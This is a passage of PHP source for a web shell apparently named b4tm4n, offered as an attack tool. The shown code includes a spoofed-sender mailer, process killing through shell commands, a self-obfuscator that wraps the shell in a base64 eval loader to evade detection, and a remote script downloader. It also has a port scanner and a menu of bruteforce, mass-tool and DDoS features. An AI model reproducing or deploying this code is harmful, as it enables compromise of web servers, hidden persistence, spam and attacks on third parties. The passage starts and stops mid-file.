2407 $perl->require($file);
2408 $val=$perl->somePhpFunc('test');
2409 print $val;
2410 }
2411 }
2412 if($_REQUEST['x']=="mail")
2413 {
2414 printf("
2415
2416 <div class='divide'>
2417 <div class='divide-left'>
2418 <fieldset>
2419 <legend>Mail</legend>
2420 <form onsubmit='return false;' class='mail'>
2421 <label>From</label><input type='text' id='email-from' placeholder='Attacker <very@handsome.com>' value='Attacker <very@handsome.com>'/><br>
2422 <label>Reply To</label><input type='text' id='email-reply' placeholder=very@handsome.com' value='very@handsome.com'/><br>
2423 <label>To</label><input type='text' id='email-to' placeholder='Target 1 <target1@target.com>,Target 2 <target2@target.com>' value=''/><br>
2424 <label>Cc</label><input type='text' id='email-cc' placeholder='target1@target.com,target2@target.com' value=''/><br>
2425 <label>Bcc</label><input type='text' id='email-bcc' placeholder='target1@target.com,target2@target.com' value=''/><br>
2426 <label>Subject</label><input type='text' id='email-subject' placeholder='What You Waiting For ?' value=''/><br>
2427 <label>Attachment (FIlename)</label><input type='text' id='email-attachment' placeholder='%s' value=''/><br>
2428 <label>Messages</label><input type='text' id='email-message'/><br>
2429 <input type='submit' value='Send' onclick=\"
2430
2431 getAjax(true,
2432 'send-result',
2433 'POST',
2434 '?x=mail&xa=send'+
2435 '&from='+document.getElementById('email-from').value+
2436 '&reply='+document.getElementById('email-reply').value+
2437 '&to='+document.getElementById('email-to').value+
2438 '&cc='+document.getElementById('email-cc').value+
2439 '&bcc='+document.getElementById('email-bcc').value+
2440 '&subject='+document.getElementById('email-subject').value+
2441 '&message='+document.getElementById('email-message').value+
2442 '&attachment='+document.getElementById('email-attachment').value);
2443
2444 \"/>
2445 </form>
2446 </fieldset>
2447 </div>
2448 <div class='divide-right'>
2449 <fieldset>
2450 <legend>Result's</legend>
2451 <div id='send-result'></div>
2452 </fieldset>
2453 </div>
2454 </div>
2455
2456 ",php_self);
2457
2458 if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send')
2459 {
2460 ob_clean();
2461 $from=$_REQUEST['from'];
2462 $reply=$_REQUEST['reply'];
2463 $to=$_REQUEST['to'];
2464 $cc=$_REQUEST['cc'];
2465 $bcc=$_REQUEST['bcc'];
2466 $subject=$_REQUEST['subject'];
2467 $msg=$_REQUEST['message'];
2468 $attachment=$_REQUEST['attachment'];
2469 $uid=md5(uniqid(time()));
2470
2471 $headers[]="From: $from";
2472 $headers[]="Reply-To: $reply";
2473 $headers[]="To: $to";
2474 if(!empty($cc)) $headers[]='Cc: $cc';
2475 if(!empty($bcc)) $headers[]='Bcc: $bcc';
2476 $headers[]="MIME-Version: 1.0";
2477 $headers[]="Content-Type: multipart/mixed; boundary=\"$uid\"";
2478
2479 $messages[]="--$uid";
2480 $messages[]="Content-type: text/html; charset=\"iso-8859-1\"";
2481 $messages[]="Content-Transfer-Encoding: 8bit";
2482 $messages[]="";
2483 $messages[]="$msg";
2484 $messages[]="";
2485
2486 if(is_file($attachment))
2487 {
2488 $content=file_get_contents($attachment);
2489 $content=chunk_split(base64_encode($content));
2490 $name=basename($attachment);
2491 $mime=mime_content_type($attachment);
2492
2493 $messages[]="--$uid";
2494 $messages[]="Content-Type: $mime; name=\"$name\"";
2495 $messages[]="Content-Transfer-Encoding: base64";
2496 $messages[]="Content-Disposition: attachment";
2497 $messages[]="";
2498 $messages[]="$content";
2499 $messages[]="";
2500 $messages[]="--$uid--";
2501 }
2502
2503 $message=implode("\r\n",$messages);
2504 $header=implode("\r\n",$headers);
2505
2506 if(mail($to,$subject,$message,$header))
2507 {
2508 print "Email Send";
2509 }
2510 else
2511 {
2512 $error=error_get_last();
2513 print "Error :" . $error['message'];
2514 }
2515 exit;
2516 }
2517 }
2518 if($_REQUEST['x']=='process')
2519 {
2520 printf("<div id='process-kill'><form class='new' method='post' action='?x=process&xa=kill'>
2521 <label>PID</label> <input type='text' name='pid'/>
2522 <input type='submit' value='Kill'/><br>
2523 <label>Name</label> <input type='text' name='name'/>
2524 <input type='submit' value='Kill'/>
2525 </form></div>");
2526
2527 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill")
2528 {
2529 $pid=$_REQUEST['pid'];
2530 $name=$_REQUEST['name'];
2531
2532 if(Unix())
2533 {
2534 $kill=Execute("kill 9 $pid");
2535 $kill=Execute("kill 9 $name");
2536 if($kill) print '<font class="off">Process Killed</font>';
2537 }
2538 else
2539 {
2540 $kill=Execute("taskkill /f /pid $pid");
2541 $kill=Execute("taskkill /f /im $name");
2542 if($kill) print '<font class="off">Process Killed</font>';
2543 }
2544 }
2545
2546 if(Unix())
2547 {
2548 $ret=iconv('UTF-8','UTF-8',Execute('ps aux'));
2549 print '<div id="process-list"><pre>'.$ret.'</pre></div>';
2550 }
2551 else
2552 {
2553 $ret=iconv('Windows-1251','UTF-8',Execute('tasklist'));
2554 print '<div id="process-list"><pre>'.$ret.'</pre></div>';
2555 }
2556 }
2557 if($_REQUEST['x']=='shells')
2558 {
2559 print "Coming Soon";
2560 }
2561 if($_REQUEST['x']=='symlink')
2562 {
2563 print "Coming Soon";
2564 }
2565 if($_REQUEST['x']=="account")
2566 {
2567 printf("<div id='account'><form class='new' method='post' action='?x=account&xa=change'>
2568 <label>Username</label> <input type='text' name='change-username' autocomplete='off' value='%s'/> <br>
2569 <label>Password</label> <input type='text' name='change-password' autocomplete='off'value=''/><br>
2570 <input type='submit' value='Change' onclick=\"return confirm('Sure ?');\"/>
2571 </form></div>",B64D($account[0]));
2572
2573 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change")
2574 {
2575 $filename=script_filename;
2576 $username=$_REQUEST['change-password'];
2577 $password=$_REQUEST['change-username'];
2578
2579 if (!empty($username)&&!empty($password))
2580 {
2581 $user_from=$account[0];
2582 $user_to=B64E($password);
2583 $content=file_get_contents($filename);
2584 $chunk=explode($user_from,$content);
2585 $content=implode($user_to,$chunk);
2586 $change=file_put_contents($filename,$content);
2587
2588 $pass_from=$account[1];
2589 $pass_to=sha1(md5($username));
2590 $content=file_get_contents($filename);
2591 $chunk=explode($pass_from,$content);
2592 $content=implode($pass_to,$chunk);
2593 $change=file_put_contents($filename,$content);
2594
2595 if($change)
2596 {
2597 session_destroy();
2598 session_regenerate_id();
2599 header('location:'.php_self);
2600 }
2601 else
2602 {
2603 printf("Error change account");
2604 }
2605 }
2606 else
2607 {
2608 printf("<b class='off'>Mistakes !</b>");
2609 }
2610 }
2611 }
2612 if($_REQUEST['x']=="action")
2613 {
2614 $files=any('chk',$_REQUEST)?$_REQUEST['chk']:array();
2615 $value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option'];
2616 $tmp="";
2617 $row="";
2618 $count_dirs=0;
2619 $count_files=0;
2620
2621 foreach($files as $file)
2622 {
2623 if(is_dir(urld($file)))
2624 {
2625 $count_dirs++;
2626 }
2627 if(is_file(urld($file)))
2628 {
2629 $count_files++;
2630 }
2631
2632 $row.="<tr><td>".urld($file)."</td></tr>";
2633 $tmp.=urld($file).",";
2634 }
2635
2636 if(count($files)==1&&$value=='copy')
2637 {
2638 header('location:'.php_self.'?a=cp&r='.$files[0]);
2639 }
2640
2641 if(count($files)==1&&$value=='move')
2642 {
2643 header('location:'.php_self.'?a=mv&r='.$files[0]);
2644 }
2645
2646 if(!any('xa',$_REQUEST)&&$value=='delete')
2647 {
2648 printf("<h4>Dir's: [%s] File's: [%s]</h4>
2649 <table class='table'>%s</table>
2650 <form class='new' method='post' action='?x=action&xa=option'>
2651 <input type='hidden' name='action-option' value='%s'/>
2652 <input type='hidden' name='tmp' value='%s'/>
2653 <input type='submit' value='Remove'/>
2654 </form>",
2655 $count_dirs,
2656 $count_files,
2657 $row,
2658 $value,
2659 $tmp);
2660 }
2661
2662 if(!any('xa',$_REQUEST)&&$value!='delete')
2663 {
2664 printf("<h4>Dir's: [%s] File's: [%s]</h4>
2665 <table class='table'>%s</table>
2666 <form class='new' method='post' action='?x=action&xa=option'>
2667 <script>window.onload=function(e){document.getElementById('action_option').value='%s'}</script>
2668 <select name='action-option' id='action_option'>
2669 <option value='copy'>Copy</option>
2670 <option value='move'>Move</option>
2671 <option value='zip'>Archive (zip)</option>
2672 <option value='unzip'>Extract to (zip)</option>
2673 </select>
2674 <i>-></i>
2675 <input type='hidden' name='tmp' value='%s'/>
2676 <input type='text' name='newloc' value='%s'/>
2677 <input type='submit' value='Process'/>
2678 </form>",
2679 $count_dirs,
2680 $count_files,
2681 $row,
2682 $value,
2683 $tmp,
2684 $dir._);
2685 }
2686
2687 if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option')
2688 {
2689 $files=array_filter(explode(',',$_REQUEST['tmp']));
2690 $newloc=trim(@$_REQUEST['newloc']);
2691 $succ=0;
2692 $fail=0;
2693
2694 if($_REQUEST['action-option']=='copy')
2695 {
2696 if(file_exists($newloc)&&is_dir($newloc))
2697 {
2698 foreach($files as $file)
2699 {
2700 if(CopyRecursive($file,rtrim($newloc,_)._.basename($file)))
2701 {
2702 $succ++;
2703 }
2704 else
2705 {
2706 $fail++;
2707 }
2708 }
2709 print "Success: $succ | Failed: $fail";
2710 }
2711 else
2712 {
2713 print "Target not exists !";
2714 }
2715 }
2716
2717 if($_REQUEST['action-option']=='move')
2718 {
2719 if(file_exists($newloc)&&is_dir($newloc))
2720 {
2721 foreach($files as $file)
2722 {
2723 if(MoveRecursive($file,rtrim($newloc,_)._.basename($file)))
2724 {
2725 $succ++;
2726 }
2727 else
2728 {
2729 $fail++;
2730 }
2731 }
2732 print "Success: $succ | Failed: $fail";
2733 }
2734 else
2735 {
2736 print "Target not exists !";
2737 }
2738 }
2739
2740 if($_REQUEST['action-option']=='delete')
2741 {
2742 foreach($files as $file)
2743 {
2744 if(Remove($file))
2745 {
2746 $succ++;
2747 }
2748 else
2749 {
2750 $fail++;
2751 }
2752 }
2753 print "Success: $succ | Failed: $fail";
2754 }
2755
2756 if($_REQUEST['action-option']=='zip')
2757 {
2758 if(end(explode(".",$newloc))=='zip')
2759 {
2760 $zip=new ZipArchive;
2761
2762 if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE)
2763 {
2764 foreach($files as $file)
2765 {
2766 if(is_dir($file))
2767 {
2768 $zip->addEmptyDir(basename($file));
2769
2770 $recur=new RecursiveIteratorIterator(
2771 new RecursiveDirectoryIterator($file),
2772 RecursiveIteratorIterator::LEAVES_ONLY
2773 );
2774
2775 foreach ($recur as $key => $val)
2776 {
2777 if(basename($key)!="..")
2778 {
2779 if(is_dir($key))
2780 {
2781 $zdir=str_replace($file,basename($file),realpath($key));
2782 $zip->addEmptyDir($zdir);
2783 }
2784 elseif(is_file($key))
2785 {
2786 $zfile=str_replace($file,basename($file),realpath($key));
2787 $zip->addFile(realpath($key),$zfile);
2788 }
2789 }
2790 }
2791 }
2792 elseif(is_file($file))
2793 {
2794 $zip->addFile($file,basename($file));
2795 }
2796 }
2797
2798 $zip->close();
2799 print 'Zip Created';
2800 }
2801 else
2802 {
2803 print 'Failed';
2804 }
2805 }
2806 else
2807 {
2808 print 'Extension must Zip';
2809 }
2810 }
2811
2812 if($_REQUEST['action-option']=='unzip')
2813 {
2814 if(file_exists($newloc)&&is_dir($newloc))
2815 {
2816 foreach($files as $file)
2817 {
2818 if(end(explode(".",$file))=='zip')
2819 {
2820 $zip=new ZipArchive;
2821
2822 if ($zip->open($file)===TRUE)
2823 {
2824 $zip->extractTo($newloc);
2825 $zip->close();
2826 $succ++;
2827 }
2828 else
2829 {
2830 $fail++;
2831 }
2832 }
2833 else
2834 {
2835 $fail++;
2836 }
2837
2838 }
2839 print "Success: $succ | Failed: $fail";
2840 }
2841 else
2842 {
2843 print "Target not exists !";
2844 }
2845 }
2846 }
2847 }
2848 if($_REQUEST['x']=="find")
2849 {
2850 $recur=new RecursiveIteratorIterator(
2851 new RecursiveDirectoryIterator($dir),
2852 RecursiveIteratorIterator::LEAVES_ONLY
2853 );
2854
2855 if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value']))
2856 {
2857 $result="";
2858 $res_=0;
2859
2860 foreach ($recur as $key => $val)
2861 {
2862 if(basename($key)!="..")
2863 {
2864 if(strpos(realpath($key),$_REQUEST['find-value'])!== false)
2865 {
2866 $result.=sprintf("<tr>
2867 <td></td>
2868 <td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>
2869 <td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>
2870 <td><center>%s</center></td>
2871 </tr>",
2872 substr(realpath($key),0,strrpos(realpath($key),_)),
2873 substr(realpath($key),0,strrpos(realpath($key),_)),
2874 substr(realpath($key),0,strrpos(realpath($key),_)),
2875 realpath($key),
2876 realpath($key),
2877 basename(realpath($key)),
2878 GetFileTime(realpath($key),'modify')
2879 );
2880
2881 $res_++;
2882 }
2883 }
2884 }
2885
2886 printf("
2887 <form class='new' method=POST action='?x=find'>
2888 <input type='text' name='find-value' id='find-action' value='%s'/><input type='submit' name='find-button' value='Find'/>
2889 <label style='margin-left:10px'><font class='on'>Find: '%s' | Found's: %s</font></label>
2890 </form>
2891 <div class='auto-number'>
2892 <table class='table sortable'>
2893 <thead>
2894 <tr>
2895 <th class='sorttable_nosort' width='15'>No.</th>
2896 <th>Directory</th>
2897 <th>Name</th>
2898 <th>Modified</th>
2899 </tr>
2900 <tbody>%s</tbody>
2901 </table>
2902 </div>",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result);
2903 }
2904 else
2905 {
2906 print "<form class='new' method=POST action='?x=find'>
2907 <input type='text' name='find-value'/><input type='submit' name='find-button' value='Find'/>
2908 <label style='margin-left:10px'><font color='red'>Whoops, Nothing to Found's !</font></label>
2909 </form>";
2910 }
2911 }
2912 if($_REQUEST['x']=="update")
2913 {
2914 $link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php';
2915 $current_version=2.6; //New Version Released
2916
2917 if($config['debug']==true)
2918 {
2919 $latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1
2920 }
2921 else
2922 {
2923 $git_script=GetUrlContent($link_update);
2924 $get_version=strpos($git_script,"current_version");
2925 $version=substr($git_script,$get_version+16,3);
2926 $latest_version=is_numeric($version)?$version:$current_version;
2927 }
2928
2929 $status="";
2930 if((float)$latest_version>(float)$current_version)
2931 {
2932 if($config['debug']==true)
2933 {
2934 $status.='New Version Available '.$latest_version.'<br>Setting Debug to False for Activate this Feature';
2935 }
2936 else
2937 {
2938 $status.='New Version Available '.$latest_version.'<br>Download -> [<font class="on"><a href="'.$link_update.'" target="_blank">link</a></font>]';
2939 }
2940 }
2941 else
2942 {
2943 $status.='Latest Version '.$current_version;
2944 }
2945
2946 Printf("<div id='update'>
2947 <a href='https://www.gnu.org/licenses/gpl-3.0.txt' target='_blank' title='License'>
2948 <img src='https://www.gnu.org/graphics/lgplv3-88x31.png'/>
2949 </a><br><br>%s
2950 </div>",$status);
2951 }
2952 if($_REQUEST['x']=="self-encryptor")
2953 {
2954 if($php_script=htmlentities(@file_get_contents(__FILE__)))
2955 {
2956 $asu=strpos($php_script,$_SESSION["action"]["password"]);
2957 $temp=substr($php_script,$asu+48);
2958 $rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3));
2959 $rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5));
2960 $b64=array(
2961 '"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"',
2962 'strrev("ed"."oce"."d_4"."6es"."ab")',
2963 'strrev("e"."doc"."ed_"."46e"."sab")',
2964 '"b"."as"."e6"."4_"."d"."ec"."o"."de"',
2965 '"ba"."se"."6"."4_d"."e"."cod"."e"'
2966 );
2967 $rand_b64=array_rand($b64);
2968 $rand3=$b64[$rand_b64];
2969 $var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";';
2970 $var2=$rand2.'='.$rand3.';';
2971 $var=array(
2972 $var1.$var2,
2973 $var2.$var1
2974 );
2975 $rand_var=array_rand($var);
2976 $rand4=$var[$rand_var];
2977 $self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random
2978 $src_='';
2979 $src_.='<?php ';
2980 $src_.=$rand4;
2981 $src_.='@eval('.$rand2.'("';
2982 $src_.=base64_encode(htmlspecialchars_decode($self));
2983 $src_.='"))';
2984 $src_.='?>';
2985 $name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php';
2986 $file=dirname(__FILE__)._.$name;
2987 $op=fopen($file,'w+');
2988 fwrite($op,$src_);
2989 fclose($op);
2990 printf("<center class='on'>SELF ENCRYPT CREATED !!!</center>
2991 <center class='on'>
2992 Link -> <a href='%s' target='_blank'><u>%s</u></a>
2993 </center>",GetUrlFromPath($file),$name);
2994 }
2995 else
2996 {
2997 print "<center class='off'>SELF ENCRYPT ENABLE !!!</center>";
2998 }
2999 }
3000}
3001
3002/* START CUSTOM TOOLZ */
3003if(any("z",$_REQUEST))
3004{
3005 $z=$_REQUEST['z'];
3006
3007 print MenuTools(array(
3008 "target-map"=>array("title"=>"Target Map","ver"=>"1.0","auth"=>"k4mpr3t"),
3009 "port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"),
3010 "script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"),
3011 "encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"),
3012 "form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
3013 "login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
3014 "mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"),
3015 "ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"),
3016 ));
3017
3018 print "<div id='tools'>";
3019
3020 if(empty($z))
3021 {
3022 printf("<div id='thanks'>
3023 <h2>Nothing Is Secure...</h2>
3024 <h3>WHY SO serious ?!</h3>
3025 </div>");
3026 }
3027 if($z=="target-map")
3028 {
3029 print "<div class='tools-header'>
3030 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3031 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3032 </div>";
3033
3034 printf("<div id='target-map'>
3035 <form onsubmit='return false;' class='new'>
3036 <input type='text' id='map-ip' value='%s'/>
3037 <input type='submit' value='Trace' onclick=\"return getAjax(true,'target-info','POST','?z=target-map&ip='+document.getElementById('map-ip').value);\"/><br>
3038 </form>
3039 </div>
3040 <div id='target-info' class='result'></div>",gethostbyname(http_host));
3041
3042 if(any("ip",$_REQUEST))
3043 {
3044 ob_clean();
3045 $ip=!empty($_REQUEST['ip']) ? $_REQUEST['ip'] : gethostbyname(http_host);
3046 $valid=filter_var($ip,FILTER_VALIDATE_IP) or die('Invalid IP Address');
3047 if($_REQUEST['ip']==gethostbyname(http_host))
3048 {
3049 $url=B64D("zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt==");
3050 $geoip=GetUrlContent($url);
3051 $json=json_decode($geoip,true);
3052 $ip=$json['query'];
3053 }
3054 $url=sprintf(B64D("zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt==")."/%s",$ip);
3055 $geoip=GetUrlContent($url);
3056 $json=json_decode($geoip,true);
3057 $url=sprintf(B64D("zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa")."?q=%s,%s&z=10&output=embed",$json['latitude'],$json['longitude']);
3058 printf("<h3 align='center'><font class='on'>%s (%s) | %s, %s</font></h3><br>
3059 <iframe src='%s' width='100%%' height='345' frameBorder='0'><iframe>",
3060 $json['country_name'],
3061 $json['country_code'],
3062 $json['city'],
3063 $json['region_name'],
3064 $url);
3065 exit;
3066 }
3067 }
3068 if($z=="port-scanner")
3069 {
3070 print "<div class='tools-header'>
3071 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3072 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3073 </div>";
3074
3075 printf("<div id='port-scan'>
3076 <form onsubmit='return false;' class='new'>
3077 <label>Host Port</label><input type='text' id='ip-port' value='%s'/><br>
3078 <label>Start Port</label><input type='text' id='start-port' value='1'/><br>
3079 <label>End Port</label><input type='text' id='end-port' value='65535'/><br>
3080 <label>Methode</label><select id='scan-port'><option value='1'>socket_connect</option><option value='2'>fsockopen</option></select><br>
3081 <input type='submit' onclick=\"return getAjax(true,'port-result','POST','?z=port-scanner&x=scan-port&ip='+document.getElementById('ip-port').value+'&sp='+document.getElementById('start-port').value+'&ep='+document.getElementById('end-port').value+'&mtd='+document.getElementById('scan-port').value);\" value=Scan />
3082 <input type='submit' onclick=\"return ajaxAbort(true,'port-result')\" value=Cancel />
3083 </form>
3084 </div>
3085 <div id='port-result' class='result'></div>",gethostbyname(http_host));
3086
3087 if(any("x",$_REQUEST)&&$_REQUEST['x']=="scan-port")
3088 {
3089 ob_clean();
3090 $host=$_REQUEST['ip'];
3091 $from=$_REQUEST['sp'];
3092 $to =$_REQUEST['ep'];
3093 $mtd =$_REQUEST['mtd'];
3094 switch($mtd)
3095 {
3096 case '1':
3097 if(function_exists('socket_create'))
3098 {
3099 $socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP);
3100 for($conn_port=$from;$conn_port <=$to;$conn_port++)
3101 {
3102 $conn=@socket_connect($socket ,$host,$conn_port);
3103 if($conn)
3104 {
3105 print "<br>port $conn_port open";
3106 socket_close($socket);
3107 $socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP);
3108 }
3109 }
3110 }
3111 else
3112 {
3113 print "Error socket_connect<br>";
3114 }
3115 break;
3116 case '2':
3117 for($conn_port=$from;$conn_port <=$to;$conn_port++)
3118 {
3119 $conn=@fsockopen($host,$conn_port);
3120 if($conn)
3121 {
3122 print "<br>port $conn_port open";
3123 fclose($conn);
3124 }
3125 }
3126 break;
3127 }
3128 print "<br>Scan Finish.";
3129 exit;
3130 }
3131 }
3132 if($z=="script-loader")
3133 {
3134 print "<div class='tools-header'>
3135 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3136 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3137 </div>";
3138
3139 $path=dirname(__FILE__)._.'script-loader';
3140 if(!is_dir($path)) mkdir($path,0755);
3141
3142 $recur=new RecursiveIteratorIterator(
3143 new RecursiveDirectoryIterator($path),
3144 RecursiveIteratorIterator::LEAVES_ONLY
3145 );
3146
3147 $result="";
3148 foreach ($recur as $key => $val)
3149 {
3150 if(basename($key)!=".."&&basename($key)!=".")
3151 {
3152 $result.=sprintf("<tr>
3153 <td></td>
3154 <td><a href='%s' target='_blank'>%s</a></td>
3155 <td><center>%s</center></td>
3156 </tr>",
3157 GetUrlFromPath(realpath($key)),
3158 basename(realpath($key)),
3159 GetFileTime(realpath($key),'modify')
3160 );
3161 }
3162 }
3163
3164 printf("<div id='script-loader'>
3165 <div class='divide'>
3166 <div class='divide-left'>
3167 <form onsubmit='return false;' class='new'>
3168 <label>Url</label><input type='text' id='url-source' value=''/><br>
3169 <label>Filename</label><input type='text' id='file-name' value=''/><br>
3170 <input type='submit' onclick=\"return getAjax(true,'download-result','POST','?z=script-loader&url='+document.getElementById('url-source').value+'&filename='+document.getElementById('file-name').value);\"/><br>
3171 <div id='download-result' class='result'></div>
3172 </form>
3173 </div>
3174 <div class='divide-right'>
3175 <fieldset>
3176 <legend>List's</legend>
3177 <div class='auto-number'>
3178 <table class='table'>
3179 <thead><tr><th>No.</th><th>Name</th><th>Modified</th>
3180 <tbody>%s</tbody>
3181 </table>
3182 </div>
3183 </fieldset>
3184 </div>
3185 </div>
3186 </div>",$result);
3187
3188 if(any("url",$_REQUEST)&&any("filename",$_REQUEST))
3189 {
3190 ob_clean();
3191 $url=$_REQUEST['url'];
3192 $filename=$_REQUEST['filename'];
3193 $dest=rtrim($path,_)._.$filename;
3194 if(GetUrlExists($url)&&!empty($filename))
3195 {
3196 if(GetDownloadUrl($url,$dest))
3197 {
3198 $url=GetUrlFromPath($dest);
3199 printf("Success -> <a href='$url' target='_blank'><u>Link</u></a>");
3200 }
3201 else
3202 {
3203 print "<br>Failed";
3204 }
3205 print "<br>Finish";
3206 }
3207 else
3208 {
3209 print "<br>Mistakes";
3210 }
3211 exit;
3212 }
3213 }
3214 if($z=="encryptor")
3215 {
3216 print "<div class='tools-header'>
3217 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3218 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3219 </div>";
3220
3221 printf("<div id='script-loader'>
3222 <form onsubmit='return false;' class='new'>
3223 <div class='hash-control'>
3224 <div class='hash'>
3225 <input type='radio' name='encr' value='basic' checked><label>Basic</label>
3226 <select id='basic-hash'>
3227 <option value='md5'>Md5</option>
3228 <option value='asc'>Char</option>
3229 <option value='chr'>Ascii</option>
3230 <option value='sha1'>Sha1</option>
3231 <option value='crc32'>Crc32</option>
3232 <option value='B64E'>B64E</option>
3233 <option value='B64D'>B64D</option>
3234 <option value='urlencode'>URL Encode</option>
3235 <option value='urldecode'>URL Decode</option>
3236 <option value='strlen'>String Length</option>
3237 <option value='strrev'>String Reverse</option>
3238 <option value='base64_encode'>Base64 Encode</option>
3239 <option value='base64_decode'>Base64 Decode</option>
3240 <option value='entties'>Htmlentities</option>
3241 <option value='spechar'>Htmlspecialchars</option>
3242 </select>
3243 </div>
3244 <div class='hash'>
3245 <input type='radio' name='encr' value='extra'><label>Extra</label>
3246 <select id='extra-hash'>
3247 <option value='asc-hex'>Ascii => Hex</option>
3248 <option value='asc-bin'>Ascii => Binary</option>
3249 <option value='hex-asc'>Hex => Ascii</option>
3250 <option value='hex-bin'>Hex => Binary</option>
3251 <option value='bin-asc'>Binary => Ascii</option>
3252 <option value='bin-hex'>Binary => Hex</option>
3253 </select>
3254 </div>
3255 <div class='hash'>
3256 <input type='radio' name='encr' value='crypt'><label>Crypt</label>
3257 <input type='text' id='crypt-salt' name='salt' placeholder='\$alt'/>
3258 </div>
3259 <div class='hash'>
3260 <input type='radio' name='encr' value='hash'><label>Hash</label>
3261 <select id='hash-hash'><option value='md2'>md2</option><option value='md4'>md4</option><option value='md5'>md5</option><option value='sha1'>sha1</option><option value='sha256'>sha256</option><option value='sha384'>sha384</option><option value='sha512'>sha512</option><option value='ripemd128'>ripemd128</option><option value='ripemd160'>ripemd160</option><option value='ripemd256'>ripemd256</option><option value='ripemd320'>ripemd320</option><option value='whirlpool'>whirlpool</option><option value='tiger128,3'>tiger128,3</option><option value='tiger160,3'>tiger160,3</option><option value='tiger192,3'>tiger192,3</option><option value='tiger128,4'>tiger128,4</option><option value='tiger160,4'>tiger160,4</option><option value='tiger192,4'>tiger192,4</option><option value='snefru'>snefru</option><option value='gost'>gost</option><option value='adler32'>adler32</option><option value='crc32'>crc32</option><option value='crc32b'>crc32b</option><option value='haval128,3'>haval128,3</option><option value='haval160,3'>haval160,3</option><option value='haval192,3'>haval192,3</option><option value='haval224,3'>haval224,3</option><option value='haval256,3'>haval256,3</option><option value='haval128,4'>haval128,4</option><option value='haval160,4'>haval160,4</option><option value='haval192,4'>haval192,4</option><option value='haval224,4'>haval224,4</option><option value='haval256,4'>haval256,4</option><option value='haval128,5'>haval128,5</option><option value='haval160,5'>haval160,5</option><option value='haval192,5'>haval192,5</option><option value='haval224,5'>haval224,5</option><option value='haval256,5'>haval256,5</option></select>
3262 <input type='checkbox' id='hash-raw'/> Raw
3263 </div>
3264 <div class='hash'>
3265 <input type='submit' onclick=\"
3266 url='';
3267 textencode=window.btoa(document.getElementById('hashtext').value);
3268 radios=document.getElementsByName('encr');
3269 for(var i=0,length=radios.length;i<length;i++){
3270 if (radios[i].checked){
3271 switch(radios[i].value){
3272 case 'basic':
3273 url='?z=encryptor&opt=basic&hash='+document.getElementById('basic-hash').value+'&text-encode='+textencode;
3274 break;
3275 case 'extra':
3276 url='?z=encryptor&opt=extra&hash='+document.getElementById('extra-hash').value+'&text-encode='+textencode;
3277 break;
3278 case 'crypt':
3279 url='?z=encryptor&opt=crypt&salt='+document.getElementById('crypt-salt').value+'&text-encode='+textencode;
3280 break;
3281 case 'hash':
3282 url='?z=encryptor&opt=hash&hash='+document.getElementById('hash-hash').value+'&raw='+document.getElementById('hash-raw').checked+'&text-encode='+textencode;
3283 break;
3284 }
3285 break;
3286 }
3287 }
3288 return getAjax(false,'hashresult','POST',url);
3289 \"/>
3290 <input type='submit' onclick=\"
3291 tempi=document.getElementById('hashresult').value;
3292 tempi1=document.getElementById('hashtext').value;
3293 document.getElementById('hashtext').value=tempi.trim();
3294 document.getElementById('hashresult').value=tempi1.trim();
3295 \" value='Swap'/>
3296 </div>
3297 </div>
3298 <div class='hash-capture'>
3299 <div class='hash-capture-left'>
3300 <label>String</label><textarea id='hashtext'></textarea>
3301 <input type='submit' onclick=\"
3302 document.getElementById('hashtext').value='';
3303 \" value='Clear'/>
3304 </div>
3305 <div class='hash-capture-right'>
3306 <label>Result</label><textarea id='hashresult'></textarea>
3307 <input type='submit' onclick=\"
3308 document.getElementById('hashresult').value='';
3309 \" value='Clear'/>
3310 </div>
3311 </div>
3312 </form>
3313 </div>");
3314
3315 function chr_asc($str){
3316 $asc='';
3317 for($i=0;$i<strlen($str);$i++)
3318 $asc.=ord($str{$i}).' ';
3319 return rtrim($asc);
3320 }
3321
3322 function asc_chr($asc){
3323 $str='';
3324 if (strpos($asc,' ')){
3325 $exps=explode(' ',$asc);
3326 foreach($exps as $exp)
3327 $str.=chr($exp);
3328 }else{
3329 $str=chr($asc);
3330 }
